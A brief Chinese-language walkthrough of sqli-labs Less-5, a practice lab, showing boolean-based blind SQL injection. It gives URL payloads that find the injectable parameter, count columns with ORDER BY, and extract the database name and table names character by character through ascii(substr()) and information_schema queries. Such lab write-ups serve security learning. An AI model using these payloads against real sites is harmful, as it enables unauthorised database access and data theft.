1.在URL处输入
?id=1
?id=1'
?id=1"
?id=1/1
发现回显只有you are in......和报错
报错:
判断回显是布尔类型
使用order by发现回显有三栏
?id=1' order by 4%23
?id=1' order by 1%23
?id=1' order by 3%23
判断数据库长度:8位
?id=1' and length((select database()))>=9%23
?id=1' and length((select database()))>=8%23
爆破数据库名:
?id=1' and if((ascii(substr((select database()),1,1))>=1),1,0)%23
标记的区域就是爆破数字,爆破范围是0~255
?id=1' and if((ascii(substr((select database()),1,1))>=115),1,0)%23
#第一位的ascii码是115 也就是s
后续依次爆破得到数据库:security
爆破表名:
http://sqli-labs:89/less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=101%23
后续操作类似
